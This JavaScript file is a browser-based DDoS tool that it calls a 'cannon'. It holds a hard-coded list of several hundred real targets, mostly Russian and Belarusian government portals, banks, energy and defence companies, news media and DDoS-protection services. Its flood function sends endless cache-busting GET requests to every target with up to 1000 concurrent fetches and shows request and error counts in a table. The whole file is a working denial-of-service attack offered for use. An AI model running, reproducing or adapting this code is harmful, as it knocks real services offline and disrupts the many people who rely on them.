  var elements = {
    btnStart: document.getElementById("btnAction"),
    btnStop: document.getElementById("btnStop"),
    counter: document.getElementById("txtCounter"),
    stats: document.getElementById("txtStats"),
    mbInput: document.querySelector("#mbInput input"),
    mbVal: document.querySelector("#mbInput .val"),
  };

  var isActive = false;
  
  function stopCannon() {
	elements.btnStart.style.display = "initial";
	elements.btnStop.style.display = "none";
	isActive = false;
	printStats();
  }
  
  function launchCannon(){
    elements.btnStart.style.display = "none";
    elements.btnStop.style.display = "initial";
    isActive = true;
	setInterval(printStats, 100);
	targets.map(flood);
  };
  
  var targets = [
	'http://24ecp.ru',
	'http://185.157.96.191',
	'http://admship.ru',
	'http://almaz-antey.ru',
	'http://astralnalog.ru',
	'http://belarus.by',
	'http://belinfonalog.ru',
	'http://bellegprom.by',
	'http://belres.by',
	'http://belta.by',
	'http://bezformata.com',
	'http://ca.gisca.ru',
	'http://ca.kamgov.ru',
	'http://ca.ntssoft.ru',
	'http://center-inform.ru',
	'http://cfmc.ru',
	'http://cit-ufa.ru',
	'http://crypset.ru',
	'http://ctv.by',
	'http://dreamkas.ru',
	'http://e-portal.ru',
	'http://elkursk.ru',
	'http://email11.sberbank.ru',
	'http://email12.sberbank.ru',
	'http://en.kremlin.ru',
	'http://epnow.ru',
	'http://faeton.spb.ru',
	'http://fsb.ru',
	'http://government.by',
	'http://government.ru',
	'http://icentr.ru',
	'http://icvibor.ru',
	'http://imctax.parus-s.ru',
	'http://infotrust.ru',
	'http://izhtender.ru',
	'http://kartoteka.ru',
	'http://kgb.by',
	'http://kommersant.ru',
	'http://kp.ru',
	'http://kraskript.com',
	'http://kremlin.ru',
	'http://kt-69.ru',
	'http://ktrv.ru',
	'http://mascom-it.ru',
	'http://mcspro.ru',
	'http://mid.ru',
	'http://mil.ru',
	'http://mx3.cbr.ru',
	'http://nbrb.by',
	'http://nordsy.spb.ru',
	'http://nucrf.ru',
	'http://nwudc.ru',
	'http://otchet-online.ru',
	'http://otkritiefc.ru',
	'http://portal.rw.by',
	'http://president.gov.by',
	'http://prokuratura.gov.by',
	'http://rbc.ru',
	'http://rcarus.ru',
	'http://ria.ru',
	'http://riafan.ru',
	'http://rk72.ru',
	'http://roseltorg.ru',
	'http://rsbis.ru',
	'http://rw.by',
	'http://salut.ru',
	'http://sb.by',
	'http://sberbank.ru',
	'http://sputnik.by',
	'http://squaretrade.ru',
	'http://structure.mil.ru',
	'http://stv-it.ru',
	'http://ucestp.ru',
	'http://ucpir.ru',
	'http://udcs.ru',
	'http://uralvagonzavod.ru',
	'http://y-center.ru',
	'https://024.by',
	'https://1tv.ru',
	'https://3dsec.sberbank.ru',
	'https://24paybank.ne',
	'https://81.177.108.230',
	'https://84.252.144.102',
	'https://109.207.1.97',
	'https://109.207.1.118',
	'https://185.140.151.249',
	'https://185.157.96.130',
	'https://185.157.96.191',
	'https://185.169.155.16',
	'https://abcobmen.com',
	'https://acs1.sbrf.ru',
	'https://acs2.sbrf.ru',
	'https://acs3.sbrf.ru',
	'https://acs4.sbrf.ru',
	'https://acs5.sbrf.ru',
	'https://acs6.sbrf.ru',
	'https://acs7.sbrf.ru',
	'https://acs8.sbrf.ru',
	'https://agroserver.ru',
	'https://aif.ru',
	'https://alfabank.com',
	'https://alfabank.ru',
	'https://alfaradio.by',
	'https://api.developer.sber.ru',
	'https://api.developer.sber.ru/product/SberbankID',
	'https://api.sberbank.ru',
	'https://api.sberbank.ru/prod/tokens/v2/oauth',
	'https://api.sberbank.ru/prod/tokens/v2/oidc',
	'https://atb.su',
	'https://ati.su',
	'https://atomproekt.com',
	'https://atrucks.su',
	'https://azgaz.ru',
	'https://azs.tatneft.ru',
	'https://b2b-center.ru',
	'https://b2b-energo.ru',
	'https://baksman.org',
	'https://bankdabrabyt.by',
	'https://belapb.by',
	'https://belarus24.by',
	'https://belarus.by',
	'https://belarusbank.by',
	'https://belinvestbank.by',
	'https://belinvestbank.by/individual',
	'https://bellegprom.by',
	'https://belmarket.by',
	'https://belneftekhim.by',
	'https://belnovosti.by',
	'https://belres.by',
	'https://belta.by',
	'https://bestchange.ru',
	'https://betatransfer.org',
	'https://bezformata.com',
	'https://bgp.by',
	'https://bitokk.biz',
	'https://bonkypay.com',
	'https://brrb.by',
	'https://bspb.ru',
	'https://cashbank.pro',
	'https://cbr.ru',
	'https://centrinvest.com',
	'https://changer.club',
	'https://cian.ru',
	'https://cleanbtc.ru',
	'https://cloud.rkn.gov.ru',
	'https://coinpaymaster.com',
	'https://crediteurope.ru',
	'https://crimea.kp.ru',
	'https://ctv.by',
	'https://customs.gov.ru',
	'https://ddos-guard.net',
	'https://delets.cash',
	'https://domclick.ru',
	'https://enel.ru',
	'https://energo.by',
	'https://energybase.ru',
	'https://er.ru',
	'https://eurosib.ru',
	'https://evraz.com',
	'https://flashobmen.com',
	'https://fontanka.ru',
	'https://fsb.ru',
	'https://fsk-ees.ru',
	'https://gazeta.ru',
	'https://gazprom-neft.com',
	'https://gazprom-spacesystems.ru',
	'https://gazprom.com',
	'https://gazprom.ru',
	'https://gazpromavia.ru',
	'https://gazprombank.com',
	'https://gazprombank.ru',
	'https://glava-lnr.info',
	'https://good-tender.ru',
	'https://gosuslugi1.ru',
	'https://gosuslugi2.ru',
	'https://gosuslugi3.ru',
	'https://gosuslugi4.ru',
	'https://gosuslugi5.ru',
	'https://gosuslugi7.ru',
	'https://gosuslugi10.ru',
	'https://gosuslugi11.ru',
	'https://gosuslugi12.ru',
	'https://gosuslugi16.ru',
	'https://gosuslugi19.ru',
	'https://gosuslugi21.ru',
	'https://gosuslugi22.ru',
	'https://gosuslugi23.ru',
	'https://gosuslugi24.ru',
	'https://gosuslugi26.ru',
	'https://gosuslugi28.ru',
	'https://gosuslugi29.ru',
	'https://gosuslugi31.ru',
	'https://gosuslugi34.ru',
	'https://gosuslugi35.ru',
	'https://gosuslugi38.ru',
	'https://gosuslugi39.ru',
	'https://gosuslugi41.ru',
	'https://gosuslugi46.ru',
	'https://gosuslugi48.ru',
	'https://gosuslugi52.ru',
	'https://gosuslugi53.ru',
	'https://gosuslugi55.ru',
	'https://gosuslugi56.ru',
	'https://gosuslugi59.ru',
	'https://gosuslugi61.ru',
	'https://gosuslugi64.ru',
	'https://gosuslugi65.ru',
	'https://gosuslugi66.ru',
	'https://gosuslugi67.ru',
	'https://gosuslugi68.ru',
	'https://gosuslugi70.ru',
	'https://gosuslugi71.ru',
	'https://gosuslugi72.ru',
	'https://gosuslugi73.ru',
	'https://gosuslugi74.ru',
	'https://gosuslugi75.ru',
	'https://gosuslugi77.ru',
	'https://gosuslugi78.ru',
	'https://gosuslugi82.ru',
	'https://gosuslugi86.ru',
	'https://gosuslugi91.ru',
	'https://gosuslugi92.ru',
	'https://gosuslugi112.ru',
	'https://gosuslugi196.ru',
	'https://gosuslugi.astrobl.ru',
	'https://gosuslugi.ru',
	'https://gov.ru',
	'https://government.by',
	'https://government.ru',
	'https://grodnonews.by',
	'https://homecredit.ru',
	'https://iecp.ru',
	'https://interfax.ru',
	'https://interrao.ru',
	'https://irecommend.ru',
	'https://irkutskenergo.ru',
	'https://iz.ru',
	'https://kalashnikovgroup.ru',
	'https://kgb.by',
	'https://kk.bank',
	'https://kommersant.ru',
	'https://kontur.ru',
	'https://kp.ru',
	'https://kremlin.ru',
	'https://kupibit.me',
	'https://kuzbassenergo.ru',
	'https://lemzspb.ru',
	'https://lenta.ru',
	'https://lentainform.com',
	'https://loginet.ru',
	'https://logistics.ru',
	'https://lukoil.com',
	'https://lukoil.ru',
	'https://magnit.ru',
	'https://mail.rkn.gov.ru',
	'https://mail.ru',
	'https://metalloinvest.com',
	'https://microconnect.ru',
	'https://mid.ru',
	'https://miit.ru',
	'https://mil.by',
	'https://mil.ru',
	'https://militaryarms.ru',
	'https://mine.exchange',
	'https://mininform.gov.by',
	'https://minsknews.by',
	'https://mk.ru',
	'https://mkb.ru',
	'https://moesk.ru',
	'https://moex.com',
	'https://mogilevnews.by',
	'https://more.tv',
	'https://mos.ru',
	'https://mosenergosbyt.ru',
	'https://mosoblbank.ru',
	'https://mosoblgaz.ru',
	'https://mosreg.ru',
	'https://mtk-azs.com',
	'https://mtsbank.ru',
	'https://multichange.net',
	'https://mvd.gov.by',
	'https://mvd.gov.ru',
	'https://mvdlnr.ru',
	'https://mx4.cbr.ru',
	'https://nachfin.info',
	'https://nalog.gov.ru',
	'https://nalog.ru',
	'https://nangs.org',
	'https://nbdoc.ru',
	'https://nbrb.by',
	'https://netex24.net',
	'https://newsua.ru',
	'https://nlmk.com',
	'https://nornickel.com',
	'https://nornik.ru',
	'https://novatek.ru',
	'https://novayagazeta.ru',
	'https://novostinedeli24.com',
	'https://ogk1.com',
	'https://ogk2.ru',
	'https://omk.ru',
	'https://omz.ru',
	'https://online.sberbank.ru',
	'https://ont.by',
	'https://ooo-nemo.ru',
	'https://open.ru',
	'https://otc.ru',
	'https://pass.rw.by',
	'https://peretok.ru',
	'https://petrolplus.ru',
	'https://pfr.gov.ru',
	'https://pikabu.ru',
	'https://platov.co',
	'https://pnp.ru',
	'https://pochta.ru',
	'https://polymetalinternational.com',
	'https://polyus.com',
	'https://president.gov.by',
	'https://priorbank.by',
	'https://profile.sber.ru',
	'https://prokuratura.gov.by',
	'https://promgaz.gazprom.ru',
	'https://promsvyaz.by',
	'https://prostocash.com',
	'https://proverki.gov.ru',
	'https://psbank.ru',
	'https://pwd.wto.economy.gov.ru',
	'https://qrator.net',
	'https://radiobelarus.by',
	'https://radiobrestfm.by',
	'https://radiomir.by',
	'https://radiostalica.by',
	'https://radiusfm.by',
	'https://raiffeisen.ru',
	'https://rambler.ru',
	'https://ramon.money',
	'https://rao-esv.ru',
	'https://rbc.ru',
	'https://rec.gov.by',
	'https://rencredit.ru',
	'https://rg.ru',
	'https://rhc.aero',
	'https://ria.ru',
	'https://ria.ru/lenta',
	'https://riafan.ru',
	'https://rkn.gov.ru',
	'https://rmk-group.ru',
	'https://rosatom.ru',
	'https://rosbank.ru',
	'https://roseltorg.ru',
	'https://rosenergoatom.ru',
	'https://rosminzdrav.ru',
	'https://rosneft.com',
	'https://rosneft.ru',
	'https://rosprint.net',
	'https://rosseti.ru',
	'https://royal.cash',
	'https://rshb.ru',
	'https://rt.com',
	'https://ru.retn.net',
	'https://rushydro.ru',
	'https://russische-botschaft.ru',
	'https://rutend.ru',
	'https://rzd.ru',
	'https://rzdlog.ru',
	'https://sb.by',
	'https://sber-bank.by',
	'https://sber.ru',
	'https://sberbank.ru',
	'https://sbi.sberbank.ru:9443',
	'https://sbis.ru',
	'https://sbrf.ru',
	'https://scr.online.sberbank.ru',
	'https://sderbank.com',
	'https://sderbank.ru',
	'https://severstal.com',
	'https://sevmash.ru',
	'https://shop-rt.com',
	'https://sibur.ru',
	'https://skbbank.ru',
	'https://slonves.by',
	'https://smi2.ru',
	'https://smotrim.ru',
	'https://smpbank.ru',
	'https://so-ups.ru',
	'https://sogaz.ru',
	'https://solidwall.ru',
	'https://sovcombank.ru',
	'https://spbexchange.com',
	'https://sputnik.by',
	'https://stormwall.pro',
	'https://stroi.gov.ru',
	'https://stroyinf.ru',
	'https://stroytransgaz.com',
	'https://superchange.net',
	'https://surgutneftegas.ru',
	'https://system.logist-pro.com',
	'https://tadviser.ru',
	'https://tass.com',
	'https://tass.ru',
	'https://tatneft.ru',
	'https://tektorg.ru',
	'https://tenderplan.ru',
	'https://tgc1.ru',
	'https://tinkoff.ru',
	'https://tmk-group.ru',
	'https://topwar.ru',
	'https://tplusgroup.ru',
	'https://trassagk.ru',
	'https://tvr.by',
	'https://tvrmogilev.by',
	'https://tvzvezda.ru',
	'https://tyumenniigiprogaz.gazprom.com',
	'https://uacrussia.ru',
	'https://uc-osnovanie.ru',
	'https://uecrus.com',
	'https://uecrus.com/rus',
	'https://ugmk.ua',
	'https://ukraina.ru',
	'https://unicreditbank.ru',
	'https://unipro.energy',
	'https://uralkali.com',
	'https://uralsib.ru',
	'https://uslugi27.ru',
	'https://uslugi.mosreg.ru',
	'https://vbrr.ru',
	'https://vedomosti.ru',
	'https://vesti.ru',
	'https://vestnik-rushydro.ru',
	'https://vgtrk.ru',
	'https://vpk-news.ru',
	'https://vsn.ru',
	'https://vsoloviev.ru',
	'https://vtb.com',
	'https://vtb.ru',
	'https://ww-pay.net',
	'https://xn--90aivcdt6dxbc.xn--p1ai',
	'https://xn--d1abbnoievn.xn--p1ai',
	'https://ya.ru',
	'https://yandex.by',
	'https://yandex.ru',
	'https://yaplakal.com',
	'https://ychanger.net',
	'https://yoomoney.ru',
	'https://zakupki.gov.ru',
	'https://zarya.by',
	'https://мвд.рф'
  ]
  
  var targetStats = {}
  targets.forEach((target) => {
    targetStats[target] = { number_of_requests: 0, number_of_errored_responses: 0 }
  })
  
  var statsEl = document.getElementById('stats');
  
  function printStats() {
    statsEl.innerHTML = '<table width="100%"><thead><tr><th>URL</th><th>Number of Requests</th><th>Number of Errors</th></tr></thead><tbody>' + Object.entries(targetStats).map(([target, { number_of_requests, number_of_errored_responses  }]) => '<tr><td>' + target + '</td><td>' + number_of_requests + '</td><td>' + number_of_errored_responses + '</td></tr>').join('') + '</tbody></table>'
  }
  
  var CONCURRENCY_LIMIT = 1000
  var queue = []
  
  async function fetchWithTimeout(resource, options) {
    const controller = new AbortController();
    const id = setTimeout(() => controller.abort(), options.timeout);
    return fetch(resource, {
      method: 'GET',
      mode: 'no-cors',
      signal: controller.signal
    }).then((response) => {
      clearTimeout(id);
      return response;
    }).catch((error) => {
      clearTimeout(id);
      throw error;
    });
  }
  
  async function flood(target) {
	for (var i = 0;; ++i) {
		if(isActive == true){
			if (queue.length > CONCURRENCY_LIMIT) {
			await queue.shift()
			}
			rand = i % 3 === 0 ? '' : ('?' + Math.random() * 1000)
			queue.push(
			fetchWithTimeout(target+rand, { timeout: 1000 })
			  .catch((error) => {
				if (error.code === 20 /* ABORT */) {
				  return;
				}
				targetStats[target].number_of_errored_responses++;
			  })
			  .then((response) => {
				if (response && !response.ok) {
				  targetStats[target].number_of_errored_responses++;
				}
				targetStats[target].number_of_requests++;
			  })

			)
		}
		
		else{
			break;
		}
	}
  }